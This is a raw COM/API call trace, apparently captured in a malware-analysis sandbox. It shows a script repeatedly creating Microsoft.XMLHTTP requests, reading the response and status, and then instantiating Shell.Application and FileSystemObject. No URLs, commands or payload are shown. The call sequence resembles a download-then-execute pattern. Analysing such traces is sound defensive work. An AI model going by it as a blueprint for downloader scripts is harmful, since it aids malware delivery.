	[0660.256] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0660.256] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0660.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0660.257] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0660.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0660.257] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0660.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0660.257] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0660.257] SysStringLen (param_1=0x0) returned 0x0
	[0660.257] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0660.257] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0660.257] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0660.257] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0660.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0660.258] ??2@YAPEAX_K@Z () returned 0x62f330
	[0660.258] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0660.258] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0660.258] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0660.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0660.258] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0660.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0660.258] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0660.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0660.258] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0660.258] SysStringLen (param_1=0x0) returned 0x0
	[0660.258] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0660.258] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0660.258] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0660.258] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0660.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0660.259] ??2@YAPEAX_K@Z () returned 0x62f310
	[0660.259] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0660.259] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0660.259] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0660.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0660.259] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0660.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0660.259] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0660.259] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0660.259] longjmp () 
	[0660.259] longjmp () 
	[0660.259] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0660.259] SysStringLen (param_1=0x0) returned 0x0
	[0660.260] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0660.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0660.260] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0660.260] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0660.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0660.260] ??2@YAPEAX_K@Z () returned 0x62f330
	[0660.260] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0660.260] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0660.260] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0660.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0660.260] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0660.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0660.260] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0660.260] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0660.260] longjmp () 
	[0660.261] longjmp () 
	[0660.261] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0660.261] SysStringLen (param_1=0x0) returned 0x0
	[0660.261] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0660.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0660.261] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0660.261] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0660.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0660.261] ??2@YAPEAX_K@Z () returned 0x62f310
	[0660.261] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0660.261] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0660.261] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0660.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0660.261] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0660.261] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0660.261] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0660.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0660.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0660.262] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0660.262] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0662.572] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0662.572] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0662.572] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0662.572] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0662.572] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0662.573] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0662.573] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0662.573] SysStringLen (param_1=0x0) returned 0x0
	[0662.573] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0662.573] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0662.573] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0662.573] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0662.573] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0662.573] ??2@YAPEAX_K@Z () returned 0x62f350
	[0662.573] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0662.573] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0662.573] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0662.573] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0662.574] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0662.574] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0662.574] SysStringLen (param_1=0x0) returned 0x0
	[0662.574] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0662.577] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
